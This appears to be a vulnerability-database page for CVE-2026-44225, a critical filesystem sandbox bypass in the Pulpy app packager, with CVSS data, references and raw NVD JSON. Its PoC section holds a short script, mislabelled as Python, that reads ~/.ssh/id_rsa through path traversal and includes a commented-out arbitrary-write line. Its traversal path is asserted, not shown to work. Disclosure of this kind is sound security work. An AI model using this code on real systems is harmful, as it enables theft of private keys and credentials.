CVE-2026-44225

Description

Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving it access to the host filesystem. A validateFsPath() function is supposed to sandbox this access, but its blocklist is incomplete. Any web app packaged with Pulpy can read and write arbitrary files in the user's home directory — including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. This vulnerability is fixed in 0.1.1.

CVSS Details

CVSS Score

9.3

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Pulpy < 0.1.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// PoC for CVE-2026-44225: Pulpy validateFsPath() Bypass
// This script demonstrates reading a sensitive file from the user's home directory

function exploitPulpyFs() {
    console.log("Attempting to bypass validateFsPath()...");

    try {
        // Construct a path to a sensitive file using path traversal
        // The incomplete blocklist fails to sanitize this sequence
        const targetFile = "/../.ssh/id_rsa";

        // Utilize the vulnerable pulpy.fs API injected into the context
        if (typeof pulpy !== 'undefined' && pulpy.fs) {
            const sensitiveData = pulpy.fs.readFile(targetFile);
            
            console.log("[+] Exploit Successful!");
            console.log("[+] File Content:");
            console.log(sensitiveData);
            
            // Potential arbitrary write example
            // pulpy.fs.writeFile("/../.malicious_config", "pwned");
        } else {
            console.log("[-] pulpy.fs API not found.");
        }
    } catch (error) {
        console.error("[-] Error during exploit execution:", error);
    }
}

// Trigger the exploit
exploitPulpyFs();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44225
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44225
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44225/
[4] VulDB https://vuldb.com/cve/CVE-2026-44225
[5] https://github.com/enesgkky/Pulpy/security/advisories/GHSA-h9q2-w73v-g7hf

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44225", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.427", "lastModified": "2026-05-12T20:16:43.427", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pulpy is a lightweight, cross-platform desktop application packager for web apps. Prior to 0.1.1, Pulpy injects a pulpy.fs JavaScript API into every packaged web application, giving it access to the host filesystem. A validateFsPath() function is supposed to sandbox this access, but its blocklist is incomplete. Any web app packaged with Pulpy can read and write arbitrary files in the user's home directory — including ~/.ssh/id_rsa, ~/.aws/credentials, and ~/Library/Keychains/. This vulnerability is fixed in 0.1.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.8}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-284"}]}], "references": [{"url": "https://github.com/enesgkky/Pulpy/security/advisories/GHSA-h9q2-w73v-g7hf", "source": "[email protected]"}]}}